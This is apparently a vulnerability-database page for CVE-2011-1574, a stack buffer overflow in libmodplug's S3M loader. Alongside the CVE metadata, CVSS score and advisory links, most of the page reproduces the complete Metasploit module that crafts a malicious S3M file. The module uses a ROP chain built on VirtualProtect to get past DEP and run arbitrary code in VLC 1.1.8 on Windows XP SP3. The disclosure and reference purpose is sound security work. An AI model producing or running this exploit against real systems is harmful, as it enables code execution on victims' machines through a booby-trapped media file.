CVE-2011-1574: Details

Overflow | 65.57% V4 | Network
Published: 2011-05-09 20:00 +00:00
Last modified: 2016-12-06 20:57 +00:00

CVE Description

Stack-based buffer overflow in the ReadS3M method in load_s3m.cpp in libmodplug before 0.8.8.2 allows remote attackers to execute arbitrary code via a crafted S3M file.

CVE Information

Related Weaknesses

CWE ID: CWE-119
Weakness name: Improper Restriction of Operations within the Bounds of a Memory Buffer
Description: The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

CVSS version: V2
Score: 6.8
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Source: nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood that a vulnerability will be exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of other CVEs. The percentile thus serves to compare a CVE's EPSS score against those of other CVEs.

Exploit Information

Exploit Database EDB-ID: 17252

Publication date: 2011-04-07 22:00 +00:00
Author: Metasploit
EDB Verified: Yes

##
# $Id: vlc_modplug_s3m.rb 12282 2011-04-08 15:48:53Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits an input validation error in libmod_plugin as
        included with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9 are
        affected. By creating a malicious S3M file, a remote attacker could execute
        arbitrary code.

        Although other products that bundle libmodplug may be vulnerable, this
        module was only tested against VLC.

        NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to permanently
        enable NX support on machines that support it. As such, this module is
        capable of bypassing DEP, but not ASLR.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'jduck' ],
      'Version'        => '$Revision: 12282 $',
      'References'     =>
        [
          [ 'CVE', '2011-1574' ],
          [ 'OSVDB', '72143' ],
          #[ 'BID', 'xxx' ],
          [ 'URL', 'http://modplug-xmms.git.sourceforge.net/git/gitweb.cgi?p=modplug-xmms/modplug-xmms;a=commitdiff;h=aecef259828a89bb00c2e6f78e89de7363b2237b' ],
          [ 'URL', 'http://hackipedia.org/File%20formats/Music/html/s3mformat.php' ],
          [ 'URL', 'https://www.sec-consult.com/files/20110407-0_libmodplug_stackoverflow.txt' ],
          [ 'URL', 'http://seclists.org/fulldisclosure/2011/Apr/113' ]
        ],
      'Payload'        =>
        {
          'Space'    => 512 - 0x24, # Space reserved for prepended mutex code
          #'DisableNops' => true,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'VLC 1.1.8 on Windows XP SP3',
            {
              # vuln is in libmod_plugin.dll, rop is custom to this module
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Apr 07, 2011', # "found: 2011-03-09"
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.s3m']),
      ], self.class)
  end

  def exploit
    num_orders   = 0x14
    num_instru   = 0x15
    num_patterns = 0x18

    hdr = "\x00" * 0x1c # song name (none)
    hdr << [
      0x1a,         # static byte
      0x10,         # ST3 module
      0x00,         # padding
      num_orders,
      num_instru,
      num_patterns,
      0x00,         # Flags
      0x1320,       # Created with (which tracker)
      0x02,         # File format information
    ].pack('CCvvvvvvv')
    hdr << "SCRM"
    hdr << [
      0x40, # global volume
      0x06, # initial speed
      0x8a, # initial tempo
      0xb0, # master volume
      0x10, # ultra click removal
      0xfb  # NOTE, non-0xfc value skips an additional loop!
            # 0xfc == default channel pan positions present
    ].pack('CCCCCC')
    hdr << "\x00" * 10 # includes pad and special pointer

    # channel settings (for 32 channels)
    hdr << "\x00\x08\x01\x09\x02\x0a\x03\x0b\x04\x0c\x05\x0d\x06\x0e\x07\x0f"
    hdr << "\xff" * 16

    # orders
    hdr << "\x07\x08\x0c\x09\x0a\x0b\x0b\x0d\x0e\x0f\x0f\x0f\x10\x11\x12\x13"
    hdr << "\x14\x16\x17\xff"

    # parapointers to instruments
    hdr << [ 0x0f ].pack('v') * num_instru

    # parapointers to patterns
    hdr << [ 0x78 ].pack('v') * num_patterns

    # channel default pan positions
    hdr << "\x00" * 32

    # instruments
    instru = "\x01metasplo.ity"
    rest = "\x00" * ((0x50 * num_instru) - instru.length)

    # Build the rop stack
    rvas = rvas_libmod_plugin_xpsp3()
    rop = generate_rop(rvas)

    zero_ptr   = rva2addr(rvas, 'Scratch') + 4
    mutex_addr = rva2addr(rvas, 'Scratch') + 8
    imp_Sleep  = rva2addr(rvas, 'imp_Sleep')

    # A mutex to prevent double payloads
    locking_code = <<-EOS
      mov ebx, [ #{imp_Sleep} ]
      jmp test_lock
    sleep:
      push 0xdeadbeef
      call ebx
    test_lock:
      mov eax, [ #{mutex_addr} ]
      test eax,eax
      jnz sleep
      lock cmpxchg [ #{mutex_addr} ], ebp
      test eax,eax
      jnz sleep
    EOS
    rop << Metasm::Shellcode.assemble(Metasm::Ia32.new, locking_code).encode_string
    rop << payload.encoded

    # This becomes the new EIP (after return)
    ret = rva2addr(rvas, 'pop eax / ret')
    rest[1267, 4] = [ ret ].pack('V')

    # In order to force return, we smash the this ptr on the stack and point
    # it so that m_nChannels turns out to be 0.
    rest[1271, 4] = [ zero_ptr - 0xe910 ].pack('V')

    # Add the ROP stack and final payload here
    rest[1275, rop.length] = rop

    instru << rest

    # patterns
    patt = [ 0x10 ].pack('v')
    patt << "\x00" * 0x10

    # finalize the file
    s3m = ""
    s3m << hdr
    instru_pad = (0x0f * 0x10) - hdr.length
    s3m << "\x80" * instru_pad
    s3m << instru

    # patch in exploit trigger values
    s3m[0x22, 2] = [ 0x220 ].pack('v')
    s3m[0x24, 2] = [ 0x220 ].pack('v')

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(s3m)
  end

  def rvas_libmod_plugin_xpsp3()
    # libmod_plugin.dll from VLC 1.1.8 (Win32)
    # Just return this hash
    {
      # Used as 'Ret' for target
      'ret'                        => 0x1022,
      'push eax / ret'             => 0x1cc4d,
      'pop eax / ret'              => 0x598a2,
      'mov eax, [eax+0x1c] / ret'  => 0x542c9,
      'pop ebx / pop ebp / ret'    => 0x25e2f,
      'add eax, 4 / pop ebp / ret' => 0x7028,
      'mov [eax+0x58], ebx / pop ebx / pop esi / pop edi / pop ebp / ret' => 0x23dad,
      'sub eax, ebx / pop ebx / pop edi / pop ebp / ret' => 0x7d64,
    }
  end

  def generate_rop(rvas)
    # ROP fun! (XP SP3 English, Apr 10 2011)
    rvas.merge!({
      # Instructions / Name => RVA
      'BaseAddress'        => 0x653c0000,
      'imp_VirtualProtect' => 0xec2f0 - 0x1c, # adjust for gadget used to resolve
      'imp_Sleep'          => 0xec2dc,
      'Scratch'            => 0x5fbfc,
      'Data'               => 0x60101,
      #'DataAdjusted'      => 0x60000 - 0x58 + 0x8,
      'DataAdjusted'       => 0x60000 - 0x58,
    })

    copy_stage = <<-EOS
      nop
      push esp
      pop esi
      lea edi, [eax+0x10]
      push 0x7f
      pop ecx
      inc ecx
      rep movsd
    EOS
    copy_stage = Metasm::Shellcode.assemble(Metasm::Ia32.new, copy_stage).encode_string
    if (copy_stage.length % 4) > 0
      raise RuntimeError, "The copy stage is invalid"
    end

    rop_stack = [
      # Resolve VirtualProtect
      'pop eax / ret',
      'imp_VirtualProtect',
      'mov eax, [eax+0x1c] / ret',

      # Call VirtualProtect
      'push eax / ret',
      'pop eax / ret', # after VirtualProtect

      # Args to VirtualProtect
      'Data',    # lpAddress (place holder, filled in @ runtime above)
      0x1000,    # dwSize
      0x40,      # flNewProtect
      'Scratch', # lpflOldProtect

      # Load the pre-adjusted Data addr
      'DataAdjusted', # matches pop eax / ret above

      ##
      # Write our little code stager to our newly executable memory.
      ##
      # Load the last 32-bits of code to write
      'pop ebx / pop ebp / ret',
      copy_stage[0, 4].unpack('V').first,
      :unused, # ebp

      # Write & advance
      'mov [eax+0x58], ebx / pop ebx / pop esi / pop edi / pop ebp / ret',
      copy_stage[4, 4].unpack('V').first,
      :unused, # esi
      :unused, # edi
      :unused, # ebp
      'add eax, 4 / pop ebp / ret',
      :unused, # ebp

      # Write & advance
      'mov [eax+0x58], ebx / pop ebx / pop esi / pop edi / pop ebp / ret',
      copy_stage[8, 4].unpack('V').first,
      :unused, # esi
      :unused, # edi
      :unused, # ebp
      'add eax, 4 / pop ebp / ret',
      :unused, # ebp

      # Write & advance
      'mov [eax+0x58], ebx / pop ebx / pop esi / pop edi / pop ebp / ret',
      0xffffffb0, # adjustment value
      :unused, # esi
      :unused, # edi
      :unused, # ebp

      # Adjust eax
      'sub eax, ebx / pop ebx / pop edi / pop ebp / ret',
      :unused, # ebx
      :unused, # edi
      :unused, # ebp

      # Execute the copy stage
      'push eax / ret',
    ]

    rop_stack.map! { |e|
      if e.kind_of? String
        # Meta-replace (RVA)
        raise RuntimeError, "Unable to locate key: \"#{e}\"" if not rvas[e]
        rvas['BaseAddress'] + rvas[e]
      elsif e == :unused
        # Randomize
        rand_text(4).unpack('V').first
      else
        # Literal
        e
      end
    }

    rop_stack.pack('V*')
  end

  def rva2addr(rvas, key)
    raise RuntimeError, "Unable to locate key: \"#{key}\"" if not rvas[key]
    rvas['BaseAddress'] + rvas[key]
  end

end

Products Mentioned

Configuration 0

Konstanty_bialkowski >> Libmodplug >> Version up to (including) 0.8.8.1
Konstanty_bialkowski >> Libmodplug >> Version 0.8
Konstanty_bialkowski >> Libmodplug >> Version 0.8.4
Konstanty_bialkowski >> Libmodplug >> Version 0.8.5
Konstanty_bialkowski >> Libmodplug >> Version 0.8.6
Konstanty_bialkowski >> Libmodplug >> Version 0.8.7
Konstanty_bialkowski >> Libmodplug >> Version 0.8.8

References

https://www.ubuntu.com/usn/USN-1148-1/
Tags: vendor-advisory, x_refsource_UBUNTU
http://openwall.com/lists/oss-security/2011/04/11/13
Tags: mailing-list, x_refsource_MLIST
http://www.gentoo.org/security/en/glsa/glsa-201203-16.xml
Tags: vendor-advisory, x_refsource_GENTOO
http://secunia.com/advisories/44870
Tags: third-party-advisory, x_refsource_SECUNIA
http://openwall.com/lists/oss-security/2011/04/11/6
Tags: mailing-list, x_refsource_MLIST
http://securitytracker.com/id?1025480
Tags: vdb-entry, x_refsource_SECTRACK
http://secunia.com/advisories/48434
Tags: third-party-advisory, x_refsource_SECUNIA
http://www.debian.org/security/2011/dsa-2226
Tags: vendor-advisory, x_refsource_DEBIAN
http://securityreason.com/securityalert/8243
Tags: third-party-advisory, x_refsource_SREASON
https://rhn.redhat.com/errata/RHSA-2011-0477.html
Tags: vendor-advisory, x_refsource_REDHAT
http://www.mandriva.com/security/advisories?name=MDVSA-2011:085
Tags: vendor-advisory, x_refsource_MANDRIVA